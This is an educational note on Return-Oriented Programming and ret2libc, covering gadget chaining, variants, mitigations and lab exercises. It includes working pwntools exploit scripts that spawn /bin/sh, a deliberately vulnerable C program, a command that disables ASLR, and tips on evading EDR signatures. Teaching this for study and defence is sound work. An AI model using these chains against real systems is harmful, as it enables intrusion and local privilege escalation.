ROP and ret2libc

Definition

Return-Oriented Programming (ROP) is the exploitation technique of chaining together small sequences of existing executable code ("gadgets" that end in a ret instruction) to perform arbitrary computation without injecting any new code into the target process. The attacker controls the stack contents (typically via a stack buffer overflow or an equivalent control-flow primitive) and arranges a sequence of gadget addresses interleaved with data; the CPU then executes each gadget in turn, because each ret pops the next gadget's address off the stack. ret2libc is the simplest code-reuse variant: instead of chaining short instruction-level gadgets, the attacker "returns into" a whole libc function, for example system("/bin/sh"), and achieves the goal with a single existing-code primitive. ROP exists because DEP/NX made injected shellcode non-executable; ROP and its siblings are the foundation of binary exploitation in the post-DEP world.

Why it matters

Before 2003, binary exploitation against a stack overflow was: write shellcode in the buffer, overwrite the saved return address to point at the buffer, run. Every modern operating system now blocks this by default, because DEP/NX marks the stack and heap non-executable. ROP is what replaced it. Nearly every binary-exploitation engagement against a modern target (Windows, macOS, Linux, iOS, Android, console firmware) uses ROP or one of its successors. Reading exploit write-ups, CTF challenges, or CVE PoCs without a working model of ROP is reading them with critical sections greyed out.

The technique is worth a dedicated teaching note for three transferable reasons:

ROP made the impossible routine. The 2007 ROP paper (Shacham, "The Geometry of Innocent Flesh on the Bone") showed that any sufficiently large executable, even a few hundred KB of standard libc, contains a Turing-complete set of gadgets. The mitigation (DEP) was not bypassed by finding a hole; it was bypassed by reusing the legitimate code that was already executable. This is the canonical example of a mitigation that defeated the wrong thing.
The cost of code execution is now "find an info leak + chain gadgets" not "write shellcode". Modern exploit research is largely about producing the right primitives to enable ROP: ASLR-defeating info leaks, stack pivots, useful gadgets, sigreturn-oriented chains. The shellcode line of the 1996 exploit became a 50-line ROP-chain construction in the 2026 exploit.
Every mitigation since ROP exists because of ROP. Intel CET shadow stacks, ARM BTI, Clang CFI, Microsoft CFG, and the explosion of CFI variants are all responses to ROP and its descendants. Understanding ROP is understanding why the modern mitigation stack looks the way it does.

This note assumes you have read memory-corruption, stack-buffer-overflow, and exploit-mitigations. It is the technique deep-dive that makes the "defeat DEP" line of those notes concrete.

How it works

ROP reduces to 5 steps:

Obtain a control-flow primitive. Most commonly, a stack-overwrite of the saved return address from a stack buffer overflow. Other primitives — heap corruption that overwrites a function-pointer object, format-string write-to-arbitrary-address, JIT type confusion — also reach the same state: the CPU is about to execute an indirect branch (ret, call rax, jmp [rax]) and the attacker controls the destination.
Locate useful "gadgets". A gadget is a short instruction sequence, usually only a handful of instructions, ending in ret (or, in JOP, ending in a jmp/call through a register). The attacker scans the target's executable code regions (typically libc, since it is large and mapped into almost every dynamically linked process) for sequences that perform useful work and end in a control-flow instruction. Tools (ROPgadget, ropper, pwntools' ROP() class) automate this.
Construct the chain. The chain is a sequence of gadget addresses interspersed with data (immediate values, addresses for the gadgets to load). Each gadget performs one small operation (load a register, syscall, push a value) and rets. The ret pops the next gadget's address off the stack and jumps to it. The stack itself is the "ROP program".
Place the chain in memory. Usually written directly onto the stack by the overflow (the chain starts at the saved-RIP location and continues into adjacent stack memory). Alternatively, written to the heap and followed by a stack-pivot gadget (xchg rsp, rax; ret or equivalent) that switches the stack pointer to the heap-located chain.
Trigger execution. When the vulnerable function returns, the first ret pops the first gadget's address and jumps. Each subsequent ret advances the chain. The final gadget typically performs the goal action: execve("/bin/sh", NULL, NULL) via syscall, system("/bin/sh") via libc, or mprotect() to mark a region executable followed by a jmp into shellcode there.
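
The five steps above can be sketched as a toy stack machine. This is a minimal model, not exploitation code: the gadget addresses (0x1000 and so on), the three gadgets, and the HALT sentinel are all invented for illustration. It only shows how data on the stack drives execution once every gadget "returns" into the next one.

```python
# Toy model of a ROP chain: the stack is a list of gadget addresses and data.
# All addresses and gadgets below are hypothetical.

def pop_rdi(regs, stack):
    regs["rdi"] = stack.pop(0)               # pop rdi: consumes one data word


def pop_rsi(regs, stack):
    regs["rsi"] = stack.pop(0)               # pop rsi: consumes one data word


def add_rdi_rsi(regs, stack):
    regs["rdi"] = regs["rdi"] + regs["rsi"]  # add rdi, rsi: consumes no data


GADGETS = {0x1000: pop_rdi, 0x1008: pop_rsi, 0x1010: add_rdi_rsi}
HALT = 0xDEAD  # sentinel standing in for "the chain reached its goal"


def run_chain(chain):
    """Execute a chain; returns the final registers and the gadget trace."""
    stack = list(chain)
    regs = {"rdi": 0, "rsi": 0}
    trace = []
    while stack:
        rip = stack.pop(0)        # the implicit `ret`: pop the next address
        if rip == HALT:
            break
        GADGETS[rip](regs, stack)  # run the gadget body
        trace.append(hex(rip))
    return regs, trace


# The "ROP program": addresses interleaved with the data they consume.
chain = [0x1000, 40, 0x1008, 2, 0x1010, HALT]
regs, trace = run_chain(chain)
print(regs, trace)
```

The chain computes 40 + 2 in rdi without any code of its own: the only attacker input is the list of numbers on the stack.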

A canonical pwntools-shaped ROP chain that calls system("/bin/sh") (ret2libc variant):

from pwn import *

context.binary = elf = ELF("./vuln")
libc = ELF("./libc.so.6")

# Assume we leaked the libc base via a separate primitive (omitted here).
libc.address = LEAKED_LIBC_BASE

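# Build the chain: alignment ret, pop rdi (arg), pointer to "/bin/sh", system().
rop = ROP(libc)
pop_rdi = rop.find_gadget(["pop rdi", "ret"]).address
ret = rop.find_gadget(["ret"]).address
rop.raw(ret)                                      # padding: keeps rsp 16-byte aligned at system() entry
rop.raw(pop_rdi)                                  # gadget 1: set rdi
rop.raw(next(libc.search(b"/bin/sh\0")))          # data: address of "/bin/sh"
rop.raw(libc.symbols["system"])                   # gadget 2: call system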

# Overwrite saved RIP with the chain.
OFFSET = 72   # from cyclic-find against the binary
payload = b"A" * OFFSET + rop.chain()

# Trigger.
io = process(elf.path)
io.sendline(payload)
io.interactive()

The root issue is not that Linux loads libc into the process; it is that the legitimate code already in the address space is, when chained via control-flow corruption, sufficient to compute anything. DEP only restricted where code can live, not how existing code is reused.
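
As a rough picture of what such a payload looks like on the wire, the following standard-library sketch lays out a ret2libc chain by hand. The base address and every offset are placeholder values chosen for illustration, not taken from any real libc, and the leading bare ret is an assumption that the target's system() needs a 16-byte-aligned stack.

```python
import struct

# Placeholder values for illustration only; real ones come from the target libc.
LIBC_BASE = 0x7FFFF7C00000
RET_OFFSET = 0x29000       # hypothetical offset of a bare `ret`
POP_RDI_OFFSET = 0x2A000   # hypothetical offset of `pop rdi; ret`
BINSH_OFFSET = 0x1D8000    # hypothetical offset of the "/bin/sh" string
SYSTEM_OFFSET = 0x50000    # hypothetical offset of system()
OFFSET = 72                # padding up to the saved return address


def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


def build_payload(base):
    words = [
        base + RET_OFFSET,      # alignment padding
        base + POP_RDI_OFFSET,  # pop rdi; ret
        base + BINSH_OFFSET,    # value popped into rdi
        base + SYSTEM_OFFSET,   # system(rdi)
    ]
    return b"A" * OFFSET + b"".join(p64(w) for w in words)


payload = build_payload(LIBC_BASE)
print(len(payload), payload[OFFSET:].hex())
```

Every 64-bit user-space address carries zero bytes in its upper part, so the payload contains NUL bytes. The input path therefore has to be binary-safe (read, fgets, gets); a strcpy-style copy would stop at the first address.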

Techniques / patterns

Use ROPgadget or ropper to enumerate gadgets first. ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | head -50 shows the available primitives. The right gadget for the right register can be 30 seconds of search; the wrong gadget produces a 4-hour rabbit hole.
one_gadget finds shortcuts in libc. one_gadget libc.so.6 searches for single-jump sequences that yield a shell. Each "one-gadget" has constraints — typically register state requirements (e.g., r12 == NULL) — that the attacker must satisfy. When the constraints match the post-overflow register state, the entire ROP chain collapses to one address.
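The ret2csu pattern provides near-universal gadgets in binaries linked against older glibc. In dynamically linked binaries built against glibc before 2.34, __libc_csu_init contains a pair of gadgets: one that pops rbx, rbp, r12, r13, r14, r15 and returns, and one that moves three of those registers into rdx, rsi, edi and then executes a controlled call qword ptr [r12+rbx*8] (the exact register assignment varies by toolchain version). Together they set argument registers and perform an indirect call, which makes them a general-purpose building block. glibc 2.34 removed __libc_csu_init from newly linked binaries, so confirm it exists before planning around it. Senior exploits routinely use ret2csu when one_gadget doesn't fit.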
Stack pivots move the chain off the original stack. When the overflow buffer is too small to hold a full chain, use a pivot gadget (xchg rsp, rax; ret, or mov rsp, rax; ret, or leave; ret with a controlled rbp) that switches the stack pointer to a controllable region (heap, .data, BSS), where the rest of the chain lives.
ROP chains must respect calling conventions. x86-64 System V passes the first six arguments in rdi, rsi, rdx, rcx, r8, r9. The right ROP chain sets these registers before the call gadget. Windows x64 uses rcx, rdx, r8, r9 plus shadow space — different gadget set required.
ASLR must be defeated first. ROP-gadget addresses must be exact. ASLR randomizes libc base per-process; without a libc-leak primitive, the chain doesn't know where its gadgets live. Senior exploitation chains always include an info-leak phase before the ROP phase.
CET defeats classic ROP. Adapt or chain a CET bypass. Modern systems with Intel CET enforce that ret instructions return only to addresses on the shadow stack. Pure ROP fails at the first gadget that wasn't called legitimately. Adaptations: SROP (sigreturn-oriented programming) when the attacker can fake a signal frame; COP (call-oriented programming) targeting indirect-call gadgets that CET-ENDBR permits; CET-bypass techniques specific to the target.
OPSEC: ROP chains leave detectable patterns. EDR products fingerprint common gadget sequences, particularly pop rdi; ret followed by a /bin/sh address followed by system() call. Custom-built chains and uncommon gadgets reduce signature hits but raise development cost.
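
The gadget-enumeration step at the top of this list can be illustrated with a deliberately crude byte-pattern search. Real tools such as ROPgadget disassemble around each candidate ending; this sketch only matches a few fixed x86-64 encodings. The code bytes and the 0x401000 base are made up for the demonstration.

```python
# Fixed x86-64 encodings of a few common gadgets.
PATTERNS = {
    "pop rdi; ret": bytes.fromhex("5fc3"),
    "pop rsi; ret": bytes.fromhex("5ec3"),
    "pop rdx; ret": bytes.fromhex("5ac3"),
    "syscall; ret": bytes.fromhex("0f05c3"),
    "leave; ret": bytes.fromhex("c9c3"),
}


def find_gadgets(code, base, patterns=PATTERNS):
    """Return {gadget name: [addresses]} for every pattern occurrence in code."""
    hits = {}
    for name, pattern in patterns.items():
        addresses = []
        index = code.find(pattern)
        while index != -1:
            addresses.append(base + index)
            index = code.find(pattern, index + 1)
        hits[name] = addresses
    return hits


# Hypothetical code bytes. `41 5f c3` is `pop r15; ret`; starting one byte
# later, `5f c3` decodes as `pop rdi; ret`, an unintended gadget.
code = bytes.fromhex("554889e5415fc3900f05c3")
hits = find_gadgets(code, base=0x401000)
for name, addresses in hits.items():
    print(name, [hex(a) for a in addresses])
```

The pop rdi; ret hit sits in the middle of another instruction, which is why gadget supply on x86-64 is much larger than the compiler-intended instruction stream suggests.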

Variants and bypasses

Code-reuse exploitation has 5 named techniques, each addressing a specific mitigation or constraint.

1. ret2libc (classic)

Return directly into a libc function: system(), execve(), or mprotect() followed by a jump to shellcode. The simplest code-reuse pattern. Predates ROP proper. Works when a single libc call achieves the goal. Hindered by: ASLR (a libc leak is needed); the CET shadow stack (a corrupted ret into system() mismatches the shadow copy, although libc function entry points are valid indirect-call targets under IBT, so the same idea still works when the primitive is a hijacked indirect call rather than a ret); and modern libc hardening (some distros remove the "/bin/sh" string).

2. ROP proper (gadget chaining)

Many small gadgets composed into a chain. Turing-complete on any sufficiently large code region. The modern default. Defeated by: CET shadow stack (every ret checked against the shadow copy), ARM PAC (return addresses signed), strong CFI (only valid landing pads).

3. JOP / COP (jump-oriented / call-oriented programming)

Same idea as ROP but gadgets end in jmp <reg> or call <reg> instead of ret. Doesn't touch the saved return address; bypasses canary and shadow-stack mitigations. Requires a dispatcher gadget that chains the indirect branches. More complex to construct; less common than ROP but the natural successor as CET deploys.

4. SROP (sigreturn-oriented programming)

The Linux sigreturn syscall restores full CPU state from a structure on the stack. An attacker who can invoke sigreturn with an attacker-controlled stack can set every register to any value at once. This sidesteps register-control restrictions and works without finding diverse gadgets: a single syscall; ret gadget plus a forged signal frame (ucontext_t) is enough, provided rax can first be set to the sigreturn syscall number (15 for rt_sigreturn on x86-64).
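
A minimal sketch of the forged frame, assuming the Linux x86-64 layout as it is commonly used by exploit tooling (31 eight-byte slots, 248 bytes). Treat the field order as an assumption to verify against the target kernel's headers; the addresses passed in are hypothetical.

```python
import struct

# Assumed slot order of the signal frame prefix on Linux x86-64.
FIELDS = [
    "uc_flags", "uc_link", "ss_sp", "ss_flags", "ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "fpstate", "reserved", "sigmask",
]


def build_sigreturn_frame(**registers):
    """Pack a fake frame; unspecified slots are zero, cs defaults to 0x33."""
    values = dict.fromkeys(FIELDS, 0)
    values["csgsfs"] = 0x33  # 64-bit user-mode code segment selector
    for name, value in registers.items():
        if name not in values:
            raise KeyError(f"unknown frame field: {name}")
        values[name] = value
    return b"".join(struct.pack("<Q", values[name]) for name in FIELDS)


# Hypothetical goal: execve(0x404800, NULL, NULL), resuming at a `syscall`
# instruction assumed to live at 0x401234.
frame = build_sigreturn_frame(
    rax=59,          # execve syscall number on x86-64
    rdi=0x404800,    # hypothetical address of a "/bin/sh" string
    rsi=0,
    rdx=0,
    rip=0x401234,    # hypothetical address of a syscall instruction
    rsp=0x404900,    # hypothetical writable stack for the resumed context
)
print(len(frame), FIELDS.index("rip") * 8)
```

In a real chain the frame would sit on the stack immediately after the address of the syscall; ret gadget, with rax already holding 15.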

5. Data-only attacks

Don't corrupt control flow at all. Instead, corrupt data the program reads: flip an is_admin flag, swap a function-pointer table entry that the program legitimately calls, or modify environment-variable values that a subsequent execve reads. Defeats CFI and CET entirely because no illegal control flow occurs. Increasingly the modern attack pattern against well-hardened targets.
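
The is_admin case can be modelled in a few lines. This is a toy model under stated assumptions: the record layout (a 16-byte name followed by a 32-bit flag) and the unchecked copy routine are invented for illustration and stand in for a C struct and a strcpy-style bug.

```python
import struct

# Hypothetical C layout: struct user { char name[16]; uint32_t is_admin; };
RECORD = struct.Struct("<16sI")


def make_record():
    return bytearray(RECORD.pack(b"guest", 0))


def unsafe_set_name(record, name):
    """Models the bug: copies without limiting the write to the 16-byte field."""
    count = min(len(name), len(record))
    record[:count] = name[:count]


def is_admin(record):
    return RECORD.unpack(record)[1] != 0


record = make_record()
before = is_admin(record)
# 16 bytes fill the name field; the next 4 land on is_admin.
unsafe_set_name(record, b"A" * 16 + struct.pack("<I", 1))
after = is_admin(record)
print(before, after)
```

No return address or function pointer is touched, so shadow stacks and CFI checks have nothing to object to.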

Impact

Ordered by typical real-world severity:

Arbitrary code execution despite DEP/NX. The defining outcome of ROP. The mitigation that made shellcode infeasible is bypassed; exploitation cost rises but does not become impossible.
Privilege escalation in setuid/setgid binaries. Sudo / passwd / mount / ping with an overflow → ROP chain → setuid(0); execve("/bin/sh"). Local root from a single bug in a privileged binary.
Sandbox-bound RCE. Browser/renderer-process RCE via JIT type confusion → ROP chain → renderer-context code execution. The chain typically continues with a kernel-side bug for sandbox escape.
Persistent ROP-based payloads. Some operational tooling (Cobalt Strike, Meterpreter, custom red-team frameworks) implements fully ROP-based payload execution — no shellcode injection, all logic in chained gadgets — to evade AV/EDR signatures that match on shellcode patterns.
Defense-research utility. ROP chains are also used defensively: by security researchers to test mitigation effectiveness, by Google Project Zero to validate that exploit primitives exist, by hardening teams to drive mitigation requirements.

Detection and defense

Ordered by effectiveness:

Intel CET shadow stack. The architectural defeat of classic ROP. Every ret is checked against a write-protected shadow copy of the return-address stack. A ROP gadget that wasn't reached via a legitimate call produces a mismatch and the CPU traps. Available on Intel Tiger Lake+ and AMD Zen 3+. Linux 6.6+ supports it; Windows 11 has CET enabled by default for compatible binaries.
ARM Pointer Authentication (PAC). The ARM equivalent: return addresses are signed with a per-process key before being stored, verified before use. A corrupted return address fails verification; the CPU traps. Available on ARMv8.3+; Apple A12+ devices and modern Pixel phones ship with PAC enabled.
Control Flow Integrity (CFI). Indirect-call instructions can only target CFI-tagged entry points. Defeats most ROP variants whose final gadgets are indirect calls. Intel IBT (ENDBR enforcement), Clang CFI, MSVC CFG. CFI alone doesn't defeat pure-ret-based ROP (CET shadow stack does that); together they restrict the entire indirect-control-flow surface.
ASLR — make gadget addresses unpredictable. ROP requires exact gadget addresses; ASLR randomizes them per-process. Each ROP chain in a modern exploit must include an info-leak phase. Strong ASLR (high entropy on libc base, executable base, stack, heap, vDSO) imposes per-exploit-chain cost on the info-leak primitive.
Compile-time CFI annotations and link-time ROP-resistance. Clang -fsanitize=cfi and similar flags emit runtime checks on indirect-call targets. RAP (Reuse Attack Protector, originally grsecurity/PaX) inserts compile-time hash checks. Both reduce the available gadget set.
EDR runtime ROP detection. Behavioral signatures on stack contents that look like gadget chains (sequences of executable addresses with no return addresses between them), unusual VirtualProtect / mprotect calls (indicating a "make region executable" step), and ROP gadget patterns in process memory. Layered on top of structural mitigations.
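
The shadow-stack check at the top of this list can be modelled as two parallel stacks. This is a conceptual sketch only: the class and exception names are invented here, and real hardware keeps the shadow copy in protected memory rather than a Python list.

```python
class ControlProtectionFault(Exception):
    """Raised when a return address does not match the shadow copy."""


class ShadowStackCPU:
    def __init__(self):
        self.stack = []    # ordinary stack: writable by program bugs
        self.shadow = []   # shadow stack: only call/ret may touch it

    def call(self, return_address):
        self.stack.append(return_address)
        self.shadow.append(return_address)

    def overwrite_return(self, value):
        """Models a stack overflow: only the ordinary stack is corrupted."""
        self.stack[-1] = value

    def ret(self):
        target = self.stack.pop()
        expected = self.shadow.pop()
        if target != expected:
            raise ControlProtectionFault(
                f"ret to {target:#x}, shadow stack says {expected:#x}"
            )
        return target


cpu = ShadowStackCPU()
cpu.call(0x401000)
print(hex(cpu.ret()))              # legitimate return passes the check

cpu.call(0x401000)
cpu.overwrite_return(0xDEADBEEF)   # first gadget address of a would-be chain
try:
    cpu.ret()
except ControlProtectionFault as fault:
    print("trapped:", fault)
```

The chain fails at its first forged ret, before any gadget executes, which is why classic ROP has to be replaced rather than tuned on such systems.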

What does not work as a primary defense

"Disable libc." Cannot — the program needs libc. Stripped/static binaries reduce the gadget surface but don't eliminate it (the program's own code provides gadgets).
"Block specific syscalls." Seccomp filters reduce post-exploitation impact but don't prevent the ROP chain from running its earlier gadgets.
AV signature matching on ROP chains. Custom chains and metamorphic gadget selection trivially defeat signature-based detection. The structural defenses (CET, PAC, CFI) are the durable layer.
Trusting "our code is too small to ROP". Shacham's 2007 paper proved that any sufficiently large standard libc (or equivalent dynamic library) contains a Turing-complete gadget set. Reducing the attacker's gadget supply is useful but not protective.

Practical labs

Run only against owned lab environments. Labs use intentionally vulnerable code.

# Lab 1 — Find gadgets in libc.
ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | head -20
ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --only "pop|ret" | head -10
# Each line is a candidate gadget for ROP construction.

# Lab 2 — Find one-gadget shortcuts.
# Install one_gadget: gem install one_gadget
one_gadget /lib/x86_64-linux-gnu/libc.so.6
# Output: addresses + constraints. Each one-gadget gives /bin/sh in one jump
# if the listed register-state constraints are met at the time of jump.

# Lab 3 — Build a ret2libc exploit against a vulnerable lab target.
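# Target program (compile with PIE off; libc address known for didactic clarity).
# Input is read with read() instead of strcpy() on argv: 64-bit addresses contain
# NUL bytes, which argv strings and strcpy cannot carry.
cat > vuln.c <<'EOF'
#include <unistd.h>
int main(void) {
    char buf[64];
    read(0, buf, 512);   /* deliberate overflow: up to 512 bytes into 64 */
    return 0;
}
EOF
gcc -fno-stack-protector -no-pie -o vuln vuln.c

# Build exploit:
cat > exploit.py <<'EOF'
import sys
from pwn import *
context.binary = elf = ELF("./vuln")
libc = elf.libc

# Without ASLR (for didactic purposes) the libc base is fixed, but it is not
# zero. It is passed in on the command line (taken from ldd below).
libc.address = int(sys.argv[1], 16)

rop = ROP(libc)
SYSTEM  = libc.symbols["system"]
BINSH   = next(libc.search(b"/bin/sh\0"))
POP_RDI = rop.find_gadget(["pop rdi", "ret"]).address   # taken from libc; a tiny binary may have none
RET     = rop.find_gadget(["ret"]).address              # alignment padding before system()

OFFSET = 72   # cyclic-find offset to saved RIP
chain = b"A" * OFFSET
chain += p64(RET)
chain += p64(POP_RDI)
chain += p64(BINSH)
chain += p64(SYSTEM)

with open("exploit.bin", "wb") as f:   # raw payload, kept for replay under gdb
    f.write(chain)

io = process(elf.path)
io.send(chain)
io.interactive()
EOF
sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'  # disable ASLR for lab
# Pass the libc load address reported by ldd; confirm it in gdb if the exploit misses.
python3 exploit.py "$(ldd ./vuln | awk '/libc\.so/ {gsub(/[()]/, "", $NF); print $NF}')"
# Expected: an interactive /bin/sh shell.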

# Lab 4 — Build a ret2csu universal-gadget chain.
# Locate __libc_csu_init in the target binary (present only in binaries linked
# against glibc older than 2.34):
objdump -d -M intel ./vuln | grep -A 40 "<__libc_csu_init>:"
# Identify the two ret2csu gadgets (register assignment varies by toolchain):
#   gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
#   gadget 2: mov rdx, r15; mov rsi, r14; mov edi, r13d; call [r12+rbx*8]
# Recent pwntools releases provide a ROP.ret2csu() helper for building this chain; see pwntools docs.

# Lab 5 — Inspect Intel CET behavior with a CET-compiled target.
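# Same flags as Lab 3 so the stack layout (and OFFSET) stays the same.
gcc -fcf-protection=full -fno-stack-protector -no-pie -o vuln_cet vuln.c
readelf -n ./vuln_cet | grep -i "x86 feature"   # expect IBT and SHSTK in the property note
# This only marks the binary as CET-compatible. Shadow-stack enforcement also
# needs CPU, kernel, and libc support, and may have to be enabled explicitly.
# Reproduce the ROP exploit from Lab 3 with the target path changed to ./vuln_cet.
# Expected where enforcement is active: SIGSEGV at the first forged ret, with a
# shadow-stack (control-protection) violation in dmesg / journalctl.
# Where it is not active, the chain still runs.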

# Lab 6 — Defender-side: detect ROP-chain signatures.
# After a ROP exploit fires (in lab), inspect the crash dump:
gdb ./vuln_cet -ex "run < exploit.bin" -ex "bt" -ex quit
# The backtrace shows non-call'd frames — a high-fidelity ROP indicator.
# In an EDR/SIEM pipeline, this corresponds to crash-dump telemetry showing
# a stack that contains executable addresses with no corresponding call frames.
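
The OFFSET = 72 used in Lab 3 comes from sending a non-repeating pattern and seeing which part of it lands on the saved return address. The sketch below imitates that workflow with a simple upper/lower/digit pattern; it is in the spirit of pwntools' cyclic helpers but does not produce the same sequence. The frame layout (64-byte buffer, 8-byte saved rbp, 8-byte saved RIP, no padding) is an assumption; compilers may lay out frames differently, so the offset should always be measured.

```python
import string

BUF_SIZE = 64      # assumed: char buf[64] at the bottom of the frame
SAVED_RBP = 8      # assumed: saved rbp directly above the buffer
SAVED_RIP = 8


def make_pattern(length):
    """Build a pattern of unique 3-byte groups: Aa0Aa1Aa2..."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the pattern space")


def simulate_overflow(data):
    """Copy data over the modelled frame and return the saved-RIP bytes."""
    frame = bytearray(BUF_SIZE + SAVED_RBP + SAVED_RIP)
    count = min(len(data), len(frame))
    frame[:count] = data[:count]
    start = BUF_SIZE + SAVED_RBP
    return bytes(frame[start:start + SAVED_RIP])


pattern = make_pattern(128)
saved_rip = simulate_overflow(pattern)   # what a debugger would show at rsp
offset = pattern.find(saved_rip)
print(saved_rip, offset)
```

On a real x86-64 target the pattern bytes form a non-canonical address, so the crash happens at the ret itself and the value is read from the top of the stack rather than from rip.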

Practical examples

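CVE-2021-3156 (Sudo Baron Samedit) exploitation chain. A heap-based buffer overflow in sudo's command-line unescaping yields heap corruption → control of an adjacent heap object. Public exploits mostly finished with data-oriented or function-pointer targets rather than a long gadget chain; a code-reuse finish follows the pattern corrupted function pointer → stack pivot → ROP chain in heap-allocated memory → setuid(0); execve("/bin/sh"). Despite stack canary + ASLR + PIE, exploitation completes. Modern Sudo exploitation is multi-stage; where a ROP segment is used, it is the code-execution finishing move.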
Pwn2Own browser chain. Renderer-process JIT type confusion → arbitrary read/write within renderer → libc-base leak → ROP chain in renderer process → renderer-process RCE → escape via Mojo IPC bug → kernel UAF → kernel ROP → SYSTEM. The "renderer ROP" and "kernel ROP" are two of the 4–8 distinct primitives in a typical winning chain.
CTF pwn category — ret2csu under modest hardening. Vulnerable binary has stack canary + PIE + DEP. Operator uses a format-string bug to leak the canary and PIE base, then ROP via the binary's own __libc_csu_init gadgets (no libc leak required — the binary's own code suffices). Demonstrates that PIE + ASLR are defeated by any address leak, regardless of source.
Game-console firmware exploit (homebrew scene). Older console firmware ships without CET. A ROP chain in the embedded webkit-based browser yields userland code execution; subsequent kernel-side ROP yields kernel privileges; chain ends with a payload that installs persistent homebrew. The technique is identical to red-team usage; the goal is benign.
Defender catches ROP via CET. Production Windows 11 box with hardware-enforced stack protection (CET shadow stack) enabled. Attacker delivers a phishing payload that exploits a third-party PDF reader built as CET-compatible, so the shadow stack is enforced for that process. The PDF-reader process attempts a ROP chain; the first illegitimate ret triggers a shadow-stack violation; the OS terminates the process; Windows Defender captures the crash and surfaces a high-confidence control-flow violation alert. The exploit didn't land.
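
Several of the chains above hinge on turning one leaked pointer into a module base. The arithmetic is small enough to sketch directly; the symbol offsets and the leaked value below are placeholders, not values from any real libc build.

```python
PAGE_SIZE = 0x1000

# Placeholder offsets; real ones are read from the exact libc in use.
PUTS_OFFSET = 0x7A3C0
SYSTEM_OFFSET = 0x4F1E0


def rebase(leaked_address, symbol_offset):
    """Derive the module base from a leaked absolute address of a known symbol."""
    base = leaked_address - symbol_offset
    if base % PAGE_SIZE != 0:
        # A base that is not page-aligned usually means the wrong libc
        # version or the wrong symbol was assumed.
        raise ValueError(f"implausible base {base:#x}")
    return base


leaked_puts = 0x7F12345E13C0          # hypothetical value read via an info leak
libc_base = rebase(leaked_puts, PUTS_OFFSET)
system_address = libc_base + SYSTEM_OFFSET
print(hex(libc_base), hex(system_address))
```

The page-alignment check is a cheap sanity test worth keeping in any exploit script: a misaligned base is caught before a chain built on wrong addresses is sent.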

Related notes

memory-corruption — the bug class that produces the control-flow primitive ROP needs.
stack-buffer-overflow — the canonical primitive source; the "how ROP starts" half of the chain.
exploit-mitigations — the mitigation landscape ROP exists to bypass and that modern ROP-resistant mitigations (CET, PAC, CFI) target.
Attacker-Defender Duality — the duality is starkly clean here: DEP was deployed, ROP was invented; CET was deployed, JOP/COP/SROP emerged. The arms race is the field.
EDR / process correlation — modern EDR detects many ROP attempts via crash-pattern and VirtualProtect anomaly signatures.
Behavioral vs Signature Detection — ROP-chain detection is purely behavioral (control-flow anomaly), not signature-based; custom chains evade signature detection trivially.
Windows Privilege Escalation — kernel ROP is one of the listed kernel-exploit privesc paths; the technique spans userspace and kernel.

Suggested future atomic notes

srop-and-sigreturn-oriented-programming — variant 4 deep dive.
jop-cop-and-data-only-attacks — variant 3 + 5 deep dive; the modern bypass classes against CET.
stack-pivots-and-large-rop-chains — the small-buffer / heap-located-chain pattern.
one-gadget-and-libc-shortcuts — practical exploit-development on the libc side.
ropgadget-ropper-pwntools-rop-class — the tooling deep dive.
cet-and-shadow-stacks-in-depth — the architectural defeat of pure ROP.
bring-your-own-vulnerable-driver — the kernel-equivalent of code-reuse: load an attacker-friendly driver to get arbitrary kernel R/W.

References

Foundational: Hovav Shacham — The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (CCS 2007, the foundational ROP paper) — https://hovav.net/ucsd/dist/geometry.pdf
Foundational: Solar Designer — Getting around non-executable stack (Bugtraq, 1997, the original ret2libc disclosure) — https://seclists.org/bugtraq/1997/Aug/63
Research / Deep Dive: Dennis Andriesse — Practical Binary Analysis (No Starch Press, 2018) — chapters on ROP construction and modern exploitation
Official Tool Docs: pwntools ROP module — https://docs.pwntools.com/en/stable/rop/rop.html
Official Tool Docs: ROPgadget — https://github.com/JonathanSalwan/ROPgadget
Research / Deep Dive: Intel — Control-flow Enforcement Technology (CET) specification — https://software.intel.com/sites/default/files/managed/4d/2a/control-flow-enforcement-technology-preview.pdf

Reference system